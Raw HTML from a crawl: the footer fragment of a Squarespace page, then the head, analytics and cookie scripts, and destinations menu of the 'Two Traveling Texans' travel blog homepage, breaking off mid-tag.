</footer> </div> </div> <script src="https://static1.squarespace.com/static/ta/52e968b5e4b04d2aa2a3bba3/1118/scripts/site-bundle.js" type="text/javascript"></script> <script type="text/javascript" data-sqs-type="imageloader-bootstrapper">(function() {if(window.ImageLoader) { window.ImageLoader.bootstrap({}, document); }})();</script><script>Squarespace.afterBodyLoad(Y);</script><svg xmlns="http://www.w3.org/2000/svg" version="1.1" style="display:none"><symbol id="instagram-icon" viewBox="0 0 64 64"><path d="M46.91,25.816c-0.073-1.597-0.326-2.687-0.697-3.641c-0.383-0.986-0.896-1.823-1.73-2.657c-0.834-0.834-1.67-1.347-2.657-1.73c-0.954-0.371-2.045-0.624-3.641-0.697C36.585,17.017,36.074,17,32,17s-4.585,0.017-6.184,0.09c-1.597,0.073-2.687,0.326-3.641,0.697c-0.986,0.383-1.823,0.896-2.657,1.73c-0.834,0.834-1.347,1.67-1.73,2.657c-0.371,0.954-0.624,2.045-0.697,3.641C17.017,27.415,17,27.926,17,32c0,4.074,0.017,4.585,0.09,6.184c0.073,1.597,0.326,2.687,0.697,3.641c0.383,0.986,0.896,1.823,1.73,2.657c0.834,0.834,1.67,1.347,2.657,1.73c0.954,0.371,2.045,0.624,3.641,0.697C27.415,46.983,27.926,47,32,47s4.585-0.017,6.184-0.09c1.597-0.073,2.687-0.326,3.641-0.697c0.986-0.383,1.823-0.896,2.657-1.73c0.834-0.834,1.347-1.67,1.73-2.657c0.371-0.954,0.624-2.045,0.697-3.641C46.983,36.585,47,36.074,47,32S46.983,27.415,46.91,25.816z M44.21,38.061c-0.067,1.462-0.311,2.257-0.516,2.785c-0.272,0.7-0.597,1.2-1.122,1.725c-0.525,0.525-1.025,0.85-1.725,1.122c-0.529,0.205-1.323,0.45-2.785,0.516c-1.581,0.072-2.056,0.087-6.061,0.087s-4.48-0.015-6.061-0.087c-1.462-0.067-2.257-0.311-2.785-0.516c-0.7-0.272-1.2-0.597-1.725-1.122c-0.525-0.525-0.85-1.025-1.122-1.725c-0.205-0.529-0.45-1.323-0.516-2.785c-0.072-1.582-0.087-2.056-0.087-6.061s0.015-4.48,0.087-6.061c0.067-1.462,0.311-2.257,0.516-2.785c0.272-0.7,0.597-1.2,1.122-1.725c0.525-0.525,1.025-0.85,1.725-1.122c0.529-0.205,1.323-0.45,2.785-0.516c1.582-0.072,2.056-0.087,6.061-0.087s4.48,0.015,6.061,0.087c1.462,0.067,2.257,0.311,2.785,0.516c0.7,0.272,1.2,0.597,1.725,1.122c0.525,0.525,0.85,1.025,1.122,1.725c0.205,0.529,0.45,1.323,0.516,2.785c0.072,1.582,0.087,2.056,0.087,6.061S44.282,36.48,44.21,38.061z M32,24.297c-4.254,0-7.703,3.449-7.703,7.703c0,4.254,3.449,7.703,7.703,7.703c4.254,0,7.703-3.449,7.703-7.703C39.703,27.746,36.254,24.297,32,24.297z M32,37c-2.761,0-5-2.239-5-5c0-2.761,2.239-5,5-5s5,2.239,5,5C37,34.761,34.761,37,32,37z M40.007,22.193c-0.994,0-1.8,0.806-1.8,1.8c0,0.994,0.806,1.8,1.8,1.8c0.994,0,1.8-0.806,1.8-1.8C41.807,22.999,41.001,22.193,40.007,22.193z"/></symbol><symbol id="instagram-mask" viewBox="0 0 64 64"><path d="M43.693,23.153c-0.272-0.7-0.597-1.2-1.122-1.725c-0.525-0.525-1.025-0.85-1.725-1.122c-0.529-0.205-1.323-0.45-2.785-0.517c-1.582-0.072-2.056-0.087-6.061-0.087s-4.48,0.015-6.061,0.087c-1.462,0.067-2.257,0.311-2.785,0.517c-0.7,0.272-1.2,0.597-1.725,1.122c-0.525,0.525-0.85,1.025-1.122,1.725c-0.205,0.529-0.45,1.323-0.516,2.785c-0.072,1.582-0.087,2.056-0.087,6.061s0.015,4.48,0.087,6.061c0.067,1.462,0.311,2.257,0.516,2.785c0.272,0.7,0.597,1.2,1.122,1.725s1.025,0.85,1.725,1.122c0.529,0.205,1.323,0.45,2.785,0.516c1.581,0.072,2.056,0.087,6.061,0.087s4.48-0.015,6.061-0.087c1.462-0.067,2.257-0.311,2.785-0.516c0.7-0.272,1.2-0.597,1.725-1.122s0.85-1.025,1.122-1.725c0.205-0.529,0.45-1.323,0.516-2.785c0.072-1.582,0.087-2.056,0.087-6.061s-0.015-4.48-0.087-6.061C44.143,24.476,43.899,23.682,43.693,23.153z M32,39.703c-4.254,0-7.703-3.449-7.703-7.703s3.449-7.703,7.703-7.703s7.703,3.449,7.703,7.703S36.254,39.703,32,39.703z M40.007,25.793c-0.994,0-1.8-0.806-1.8-1.8c0-0.994,0.806-1.8,1.8-1.8c0.994,0,1.8,0.806,1.8,1.8C41.807,24.987,41.001,25.793,40.007,25.793z M0,0v64h64V0H0z M46.91,38.184c-0.073,1.597-0.326,2.687-0.697,3.641c-0.383,0.986-0.896,1.823-1.73,2.657c-0.834,0.834-1.67,1.347-2.657,1.73c-0.954,0.371-2.044,0.624-3.641,0.697C36.585,46.983,36.074,47,32,47s-4.585-0.017-6.184-0.09c-1.597-0.073-2.687-0.326-3.641-0.697c-0.986-0.383-1.823-0.896-2.657-1.73c-0.834-0.834-1.347-1.67-1.73-2.657c-0.371-0.954-0.624-2.044-0.697-3.641C17.017,36.585,17,36.074,17,32c0-4.074,0.017-4.585,0.09-6.185c0.073-1.597,0.326-2.687,0.697-3.641c0.383-0.986,0.896-1.823,1.73-2.657c0.834-0.834,1.67-1.347,2.657-1.73c0.954-0.371,2.045-0.624,3.641-0.697C27.415,17.017,27.926,17,32,17s4.585,0.017,6.184,0.09c1.597,0.073,2.687,0.326,3.641,0.697c0.986,0.383,1.823,0.896,2.657,1.73c0.834,0.834,1.347,1.67,1.73,2.657c0.371,0.954,0.624,2.044,0.697,3.641C46.983,27.415,47,27.926,47,32C47,36.074,46.983,36.585,46.91,38.184z M32,27c-2.761,0-5,2.239-5,5s2.239,5,5,5s5-2.239,5-5S34.761,27,32,27z"/></symbol><symbol id="facebook-icon" viewBox="0 0 64 64"><path d="M34.1,47V33.3h4.6l0.7-5.3h-5.3v-3.4c0-1.5,0.4-2.6,2.6-2.6l2.8,0v-4.8c-0.5-0.1-2.2-0.2-4.1-0.2 c-4.1,0-6.9,2.5-6.9,7V28H24v5.3h4.6V47H34.1z"/></symbol><symbol id="facebook-mask" viewBox="0 0 64 64"><path d="M0,0v64h64V0H0z M39.6,22l-2.8,0c-2.2,0-2.6,1.1-2.6,2.6V28h5.3l-0.7,5.3h-4.6V47h-5.5V33.3H24V28h4.6V24 c0-4.6,2.8-7,6.9-7c2,0,3.6,0.1,4.1,0.2V22z"/></symbol></svg> </body> </html>
0
<!DOCTYPE html> <!--[if IE 6]><html id="ie6" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 7]><html id="ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]><html id="ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!--><html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://twotravelingtexans.com/xmlrpc.php" /><!--[if lt IE 9]> <script src="https://twotravelingtexans.com/wp-content/themes/Extra/scripts/ext/html5.js" type="text/javascript"></script> <![endif]--> <script type="text/javascript">document.documentElement.className = 'js';</script> <link type="text/css" media="all" href="https://twotravelingtexans.com/wp-content/cache/breeze-minification/css/breeze_f6e6617bb322075d4c2dc044d81ad847.css" rel="stylesheet" /><title>Home - Two Traveling Texans</title><meta name="description" content="A travel blog full of information and inspiration to help you make the most of your vacation days." /><link rel="canonical" href="https://twotravelingtexans.com/" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="article" /><meta property="og:title" content="Home" /><meta property="og:description" content="A travel blog full of information and inspiration to help you make the most of your vacation days." /><meta property="og:url" content="https://twotravelingtexans.com/" /><meta property="og:site_name" content="Two Traveling Texans" /><meta property="article:published_time" content="2018-01-08T07:06:28+00:00" /><meta property="article:modified_time" content="2019-01-31T10:14:13+00:00" /><meta property="og:updated_time" content="2019-01-31T10:14:13+00:00" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Home" /><meta name="twitter:description" content="A travel blog full of information and inspiration to help you make the most of your vacation days." /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://twotravelingtexans.com/#website","url":"https://twotravelingtexans.com/","name":"Two Traveling Texans","potentialAction":{"@type":"SearchAction","target":"https://twotravelingtexans.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://twotravelingtexans.com/","sameAs":["https://www.facebook.com/2TravelingTexans/","http://www.instagram.com/2travelingtxns","https://www.youtube.com/channel/UCV2I37piE_o-UxjWgbPAuNw","https://www.pinterest.com/2travelingtxns/","https://twitter.com/2travelingtxns"],"@id":"https://twotravelingtexans.com/#organization","name":"Two Traveling Texans","logo":"https://twotravelingtexans.com/wp-content/uploads/2017/07/ttt-logo-v3c.jpg"}</script> <meta name="msvalidate.01" content="183CBB7540FAFF9A927758097C9CD5D0" /><meta name="yandex-verification" content="f95c23620589a093" /><link rel='dns-prefetch' href='//s0.wp.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Two Traveling Texans &raquo; Feed" href="https://twotravelingtexans.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Two Traveling Texans &raquo; Comments Feed" href="https://twotravelingtexans.com/comments/feed/" /> <script type="text/javascript" data-cfasync="false">var mi_version = '7.6.0'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-80482707-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-80482707-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'displayfeatures'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); }</script> <script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/twotravelingtexans.com\/wp-includes\/js\/wp-emoji-release.min.js"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);</script> <meta content="Extra v.2.22.6" name="generator" /><style type="text/css">img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; }</style><style id='ez-toc-inline-css' type='text/css'>div#ez-toc-container p.ez-toc-title {font-size: 120%;}div#ez-toc-container p.ez-toc-title {font-weight: 500;}div#ez-toc-container ul li {font-size: 95%;}</style><link rel='stylesheet' id='et-builder-googlefonts-cached-css' href='https://fonts.googleapis.com/css?family=Arimo%3Aregular%2Citalic%2C700%2C700italic' type='text/css' media='all' /><link rel='stylesheet' id='dashicons-css' href='https://twotravelingtexans.com/wp-includes/css/dashicons.min.css' type='text/css' media='all' /> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript'>/* */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"https:\/\/twotravelingtexans.com","hash_tracking":"false"}; /* */</script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js'></script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript'>/* */ var cnArgs = {"ajaxurl":"https:\/\/twotravelingtexans.com\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"no","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"true","cookieTime":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"1","refuse":"no","revoke_cookies":"0","revoke_cookies_opt":"automatic","secure":"1"}; /* */</script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-content/plugins/cookie-notice/js/front.min.js'></script> <script type='text/javascript' src='https://twotravelingtexans.com/wp-content/plugins/social-pug/assets/js/front-end-pro.js'></script> <link rel='https://api.w.org/' href='https://twotravelingtexans.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://twotravelingtexans.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://twotravelingtexans.com/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 5.1.1" /><link rel='shortlink' href='https://wp.me/P6BuM9-28M' /><link rel="alternate" type="application/json+oembed" href="https://twotravelingtexans.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftwotravelingtexans.com%2F" /><link rel="alternate" type="text/xml+oembed" href="https://twotravelingtexans.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftwotravelingtexans.com%2F&#038;format=xml" /> <script>(function (m, a, i, l, e, r) { m['MailerLiteObject'] = e; function f() { var c = {a: arguments, q: []}; var r = this.push(c); return "number" != typeof r ? r : f.bind(c.q); } f.q = f.q || []; m[e] = m[e] || f.bind(f.q); m[e].q = m[e].q || f.q; r = a.createElement(i); var _ = a.getElementsByTagName(i)[0]; r.async = 1; r.src = l + '?' + (~~(new Date().getTime() / 10000000)); _.parentNode.insertBefore(r, _); })(window, document, 'script', 'https://static.mailerlite.com/js/universal.js', 'ml'); var ml_account = ml('accounts', '687767', 'y1b2a3p7z3', 'load');</script> <style type="text/css" data-source="Social Pug"></style><link rel='dns-prefetch' href='//v0.wordpress.com' /><link rel='dns-prefetch' href='//jetpack.wordpress.com' /><link rel='dns-prefetch' href='//s0.wp.com' /><link rel='dns-prefetch' href='//s1.wp.com' /><link rel='dns-prefetch' href='//s2.wp.com' /><link rel='dns-prefetch' href='//public-api.wordpress.com' /><link rel='dns-prefetch' href='//0.gravatar.com' /><link rel='dns-prefetch' href='//1.gravatar.com' /><link rel='dns-prefetch' href='//2.gravatar.com' /><style type='text/css'>img#wpstats{display:none}</style><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" /><link rel="icon" href="https://twotravelingtexans.com/wp-content/uploads/2018/01/cropped-globe_png_26-1-32x32.png" sizes="32x32" /><link rel="icon" href="https://twotravelingtexans.com/wp-content/uploads/2018/01/cropped-globe_png_26-1-192x192.png" sizes="192x192" /><link rel="apple-touch-icon-precomposed" href="https://twotravelingtexans.com/wp-content/uploads/2018/01/cropped-globe_png_26-1-180x180.png" /><meta name="msapplication-TileImage" content="https://twotravelingtexans.com/wp-content/uploads/2018/01/cropped-globe_png_26-1-270x270.png" /><style id="et-extra-customizer-global-cached-inline-styles">.widget_et_recent_tweets .widget_list a,.widget_et_recent_tweets .et-extra-icon,.widget_et_recent_tweets .widget-footer .et-extra-social-icon,.widget_et_recent_tweets .widget-footer .et-extra-social-icon::before,.project-details .project-details-title,.et_filterable_portfolio .filterable_portfolio_filter a.current,.et_extra_layout .et_pb_column .module-head h1,.et_pb_extra_column .module-head h1,#portfolio_filter a.current,.woocommerce div.product div.summary .product_meta a,.woocommerce-page div.product div.summary .product_meta a,.et_pb_widget.woocommerce .product_list_widget li .amount,.et_pb_widget li a:hover,.et_pb_widget.woocommerce .product_list_widget li a:hover,.et_pb_widget.widget_et_recent_videos .widget_list .title:hover,.et_pb_widget.widget_et_recent_videos .widget_list .title.active,.woocommerce .woocommerce-info:before{color:#100a75}.single .score-bar,.widget_et_recent_reviews .review-breakdowns .score-bar,.et_pb_extra_module .posts-list article .post-thumbnail,.et_extra_other_module .posts-list article .post-thumbnail,.et_pb_widget .widget_list_portrait,.et_pb_widget .widget_list_thumbnail,.quote-format,.link-format,.audio-format .audio-wrapper,.paginated .pagination li.active,.score-bar,.review-summary-score-box,.post-footer .rating-stars #rating-stars img.star-on,.post-footer .rating-stars #rated-stars img.star-on,.author-box-module .author-box-avatar,.timeline-menu li.active a:before,.woocommerce div.product form.cart .button,.woocommerce-page div.product form.cart .button,.woocommerce div.product form.cart .read-more-button,.woocommerce-page div.product form.cart .read-more-button,.woocommerce div.product form.cart .post-nav .nav-links .button,.woocommerce-page div.product form.cart .post-nav .nav-links .button,.woocommerce .woocommerce-message,.woocommerce-page .woocommerce-message{background-color:#100a75}#et-menu>li>ul,#et-menu li>ul,#et-menu>li>ul>li>ul,.et-top-search-primary-menu-item .et-top-search,.et_pb_module,.module,.page article,.authors-page .page,#timeline-sticky-header,.et_extra_other_module,.woocommerce .woocommerce-info{border-color:#100a75}body{font-size:16px}h1,h2,h3,h4,h5,h6,h1 a,h2 a,h3 a,h4 a,h5 a,h6 a{line-height:2em}h1,h2,h3,h4,h5,h6,h1 a,h2 a,h3 a,h4 a,h5 a,h6 a{font-weight:bold;font-style:normal;text-transform:none;text-decoration:none}h1,h2,h3,h4,h5,h6,h1 a,h2 a,h3 a,h4 a,h5 a,h6 a{font-family:'Arimo',Helvetica,Arial,Lucida,sans-serif}body{font-family:'Arimo',Helvetica,Arial,Lucida,sans-serif}#et-menu li a{font-size:18px}#et-menu li{letter-spacing:1px}#et-menu li{font-family:'Arimo',Helvetica,Arial,Lucida,sans-serif}#et-navigation ul li,#et-navigation li a,#et-navigation>ul>li>a{font-weight:600;font-style:normal;text-transform:none;text-decoration:none}#et-menu>li a,#et-menu>li.menu-item-has-children>a:after,#et-menu>li.mega-menu-featured>a:after,#et-extra-mobile-menu>li.mega-menu-featured>a:after{color:#ffffff}#main-header{background-color:#100a75}#et-secondary-menu li{font-size:12px}@media only screen and (min-width:768px){#main-header .logo{height:128px;margin:0px 0}.header.left-right #et-navigation>ul>li>a{padding-bottom:55px}}@media only screen and (min-width:768px){.et-fixed-header #main-header .logo{height:78px;margin:0px 0}.et-fixed-header .header.left-right #et-navigation>ul>li>a{padding-bottom:31px}}a.page{border-color:transparent}#main-content{padding-top:0px!important}.bounce.et_pb_fullwidth_header .et_pb_fullwidth_header_container .header-content a.et_pb_button{margin-top:0px!important}.bounce.et_pb_fullwidth_header p{margin-bottom:0!important}#main-content .container{width:100%!important;max-width:100%!important}.bounce.et_pb_fullwidth_header .header-image{position:relative;top:-124px}@media (min-width:981px){.custom-section.et_pb_fullwidth_section{height:calc(100vh - 178px)}.custom-section.et_pb_fullwidth_section{height:76vh}}.single-post .post-footer{display:none}@media only screen and (min-width:768px){.custom-blog .et_pb_post{min-height:860px;max-height:860px}}.custom-blog .et_pb_post{padding-bottom:60px;position:relative}.custom-blog a.more-link{text-transform:uppercase;text-align:center;border:solid 1px #100a75;padding:5px;position:absolute;bottom:0;left:0;right:0;transition:all ease 0.5s}.custom-blog a.more-link:hover{background:#100a75;color:#fff}.single-post #ez-toc-container ul li a{color:#100a75!important}.single-post #main-content a,.single-post #main-content a span{color:#100a75;font-weight:bold}div.sw-pinit{width:100%!important}a.nc_tweet{color:#fff!important}.single-post .post-footer{display:none}.et_pb_fullwidth_image .dpsp-pin-it-wrapper{width:100%}body span[class^=PIN_]{display:block}</style></head><body data-rsssl=1 class="home page-template-default page page-id-8232 cookies-not-set et_bloom et_extra et_pb_pagebuilder_layout et_fullwidth_nav et_fixed_nav boxed_layout et_pb_gutters3 et_primary_nav_dropdown_animation_fadeInTop et_secondary_nav_dropdown_animation_Default et_includes_sidebar et-db et_minified_js et_minified_css"><div id="page-container" class="page-container"><header class="header left-right"><div id="top-header" style=""><div class="container"><div id="et-secondary-nav" class="et-trending"><div id="et-trending"> <a id="et-trending-button" href="#" title=""> <span></span> <span></span> <span></span> </a><h4 id="et-trending-label"> TRENDING:</h4><div id='et-trending-container'><div id="et-trending-post-4925" class="et-trending-post et-trending-latest"> <a href="https://twotravelingtexans.com/philadelphia-mural-mile-tour/">Philadelphia Mural Tour: Street Art That Changes Lives!</a></div><div id="et-trending-post-4474" class="et-trending-post"> <a href="https://twotravelingtexans.com/niagara-falls-helicopter-ride-remember/">Niagara Falls Helicopter Ride to Remember</a></div><div id="et-trending-post-4007" class="et-trending-post"> <a href="https://twotravelingtexans.com/old-man-of-storr-hike/">Old Man of Storr: Hike in the Clouds</a></div></div></div></div><div id="et-info"><ul class="et-extra-social-icons" style=""><li class="et-extra-social-icon facebook"> <a href="https://facebook.com/2travelingtexans" class="et-extra-icon et-extra-icon-background-hover et-extra-icon-facebook"></a></li><li class="et-extra-social-icon twitter"> <a href="https://twitter.com/2travelingtxns" class="et-extra-icon et-extra-icon-background-hover et-extra-icon-twitter"></a></li><li class="et-extra-social-icon pinterest"> <a href="https://pinterest.com/2travelingtxns" class="et-extra-icon et-extra-icon-background-hover et-extra-icon-pinterest"></a></li><li class="et-extra-social-icon instagram"> <a href="https://instagram.com/2travelingtxns" class="et-extra-icon et-extra-icon-background-hover et-extra-icon-instagram"></a></li><li class="et-extra-social-icon rss"> <a href="https://twotravelingtexans.com/feed/" class="et-extra-icon et-extra-icon-background-hover et-extra-icon-rss"></a></li><li class="et-extra-social-icon youtube"> <a href="https://youtube.com/c/twotravelingtexans?sub_confirmation=1" class="et-extra-icon et-extra-icon-background-hover et-extra-icon-youtube"></a></li></ul><div class="et-top-search" style=""><form role="search" class="et-search-form" method="get" action="https://twotravelingtexans.com/"> <input type="search" class="et-search-field" placeholder="Search" value="" name="s" title="Search for:" /> <button class="et-search-submit"></button></form></div></div></div></div><div id="main-header-wrapper"><div id="main-header" data-fixed-height="78"><div class="container"> <a class="logo" href="https://twotravelingtexans.com/" data-fixed-height="100"> <img src="https://twotravelingtexans.com/wp-content/uploads/2018/01/ttt-logo-v3c-with-white-text.png" alt="Two Traveling Texans" id="logo" /> </a><div id="et-navigation" class=""><ul id="et-menu" class="nav"><li id="menu-item-8196" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8196"><a href="https://twotravelingtexans.com/destinations/">Destinations</a><ul class="sub-menu"><li id="menu-item-8220" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8220"><a href="https://twotravelingtexans.com/destinations/asia/">Asia</a><ul class="sub-menu"><li id="menu-item-8222" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8222"><a href="https://twotravelingtexans.com/destinations/asia/hong-kong/">Hong Kong</a></li><li id="menu-item-8221" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8221"><a href="https://twotravelingtexans.com/destinations/asia/thailand/">Thailand</a></li></ul></li><li id="menu-item-8217" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8217"><a href="https://twotravelingtexans.com/destinations/caribbean/">Caribbean</a><ul class="sub-menu"><li id="menu-item-8218" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8218"><a href="https://twotravelingtexans.com/destinations/caribbean/st-martin/">St. Martin</a></li><li id="menu-item-8219" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8219"><a href="https://twotravelingtexans.com/destinations/caribbean/the-bahamas/">The Bahamas</a></li></ul></li><li id="menu-item-8203" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8203"><a href="https://twotravelingtexans.com/destinations/europe/">Europe</a><ul class="sub-menu"><li id="menu-item-8204" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8204"><a href="https://twotravelingtexans.com/destinations/europe/france/">France</a></li><li id="menu-item-8205" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8205"><a href="https://twotravelingtexans.com/destinations/europe/ireland/">Ireland</a></li><li id="menu-item-8206" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8206"><a href="https://twotravelingtexans.com/destinations/europe/latvia/">Latvia</a></li><li id="menu-item-8207" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8207"><a href="https://twotravelingtexans.com/destinations/europe/portugal/">Portugal</a></li><li id="menu-item-8208" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8208"><a href="https://twotravelingtexans.com/destinations/europe/spain/">Spain</a></li><li id="menu-item-8209" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8209"><a href="https://twotravelingtexans.com/destinations/europe/united-kingdom/">United Kingdom</a><ul class="sub-menu"><li id="menu-item-8210" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8210"><a href="https://twotravelingtexans.com/destinations/europe/united-kingdom/england/">England</a></li><li id="menu-item-8211" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8211"><a href="https://twotravelingtexans.com/destinations/europe/united-kingdom/scotland/">Scotland</a></li></ul></li></ul></li><li id="menu-item-8212" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8212"><a href="https://twotravelingtexans.com/destinations/latin-america/">Latin America</a><ul class="sub-menu"><li id="menu-item-8213" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8213"><a href="https://twotravelingtexans.com/destinations/latin-america/argentina/">Argentina</a></li><li id="menu-item-8214" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8214"><a href="https://twotravelingtexans.com/destinations/latin-america/costa-rica/">Costa Rica</a></li></ul></li><li id="menu-item-8197" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8197"><a href="https://twotravelingtexans.com/destinations/north-america/">North America</a><ul class="sub-menu"><li id="menu-item-8198" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8198"><a href="https://twotravelingtexans.com/destinations/north-america/usa/">USA</a><ul class="sub-menu"><li id="menu-item-8199" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8199"><a href="https://twotravelingtexans.com/destinations/north-america/usa/california/">California</a></li><li id="menu-item-8200" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8200"><a href="https://twotravelingtexans.com/destinations/north-america/usa/las-vegas/">Las Vegas</a></li><li id="menu-item-8201" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8201"><a href="https://twotravelingtexans.com/destinations/north-america/usa/new-york-city/">New York City</a></li></ul></li><li id="menu-item-8202" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8202"><a href="https://twotravelingtexans.com/destinations/north-america/canada/">Canada</a></li></ul></li></ul></li><li id="menu-item-8223" class="menu-item menu-item-type-taxonomy 